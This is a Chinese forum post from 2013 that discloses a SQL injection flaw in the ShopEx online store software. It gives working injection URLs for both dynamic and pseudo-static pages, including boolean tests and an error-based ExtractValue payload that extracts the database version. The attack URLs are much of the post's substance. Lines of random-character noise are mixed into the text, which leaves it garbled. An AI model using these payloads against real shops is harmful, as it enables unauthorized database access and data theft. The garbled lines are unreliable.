注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
1 ?) Z/ S7 \* k% _) q" F
- M; m2 u3 W) O# B! p好吧,我扯远了~~7 _6 H/ i- f4 n. ~& F0 M2 k8 [2 v1 t
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
) M* R4 p; S+ [0 X; Q' i! F不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
9 V6 H( i' M9 Z' w' g
2 H0 H" p; k; Ahttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html; c* e7 T: A; o7 ~7 H$ J
) E: ?% Y" l, Z1 ~3 T7 ]4 X# F
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
) e9 i5 d. G* g; }; m& _- r4 x
0 t# y9 s5 w9 n) I* x- l8 chttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
G6 _' W# K7 U0 K$ u) C( I% W7 u2 l$ x8 M6 M; f( g) w, h. L. r
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
! x( Z9 D9 `& v) C. w' Q; F2 D
/ V; O* ^$ e$ G4 Y3 P: u * g S: z; h- m' P! ?
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。- y; g; w! w S H3 x' L
如何注入就不多说了,10多年的东西了…不会也会了…
& A3 x4 j+ b% \, O) _8 `: R
6 U1 [, H! E0 W$ L, T |
发表于 2013-2-4 16:20:04
收藏
支持
反对